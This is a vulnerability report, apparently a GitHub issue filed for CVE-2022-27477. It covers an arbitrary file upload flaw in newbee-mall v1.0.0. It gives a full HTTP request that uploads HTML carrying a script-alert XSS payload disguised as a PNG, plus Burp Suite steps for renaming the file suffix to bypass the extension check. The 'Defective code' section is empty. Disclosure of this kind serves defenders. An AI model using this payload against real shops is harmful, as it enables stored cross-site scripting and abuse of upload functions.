Headline
CVE-2022-27477: There is a File upload vulnerability exists in newbee-mall · Issue #63 · newbee-ltd/newbee-mall
Newbee-Mall v1.0.0 was discovered to contain an arbitrary file upload via the Upload function at /admin/goods/edit.
[Suggested description]
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.
[Vulnerability Type]
File upload vulnerability
[Vendor of Product]
https://github.com/newbee-ltd/newbee-mall
[Affected Product Code Base]
v1.0.0
[Affected Component]
POST /admin/upload/file HTTP/1.1
Host: localhost:28089
Content-Length: 671
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost:28089/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Referer: http://localhost:28089/admin/goods/edit/10907
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2
Connection: close
------WebKitFormBoundaryoXATzrr6JWhnTx5Q
Content-Disposition: form-data; name="file"; filename="1.html.png"
Content-Type: image/png
<script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>
<script>alert("xss")</script>
</div>
</div>
------WebKitFormBoundaryoXATzrr6JWhnTx5Q–
[Impact Code execution]
true
[Vulnerability proof]
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.
2.Open burpsuite packet capturing agent and click to upload pictures.
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.
4.Modify the value of filename to 1.html
Get the access path to file upload
Complete data update
5.Access the upload file path, and the vulnerability reproduction is completed.
[Defective code]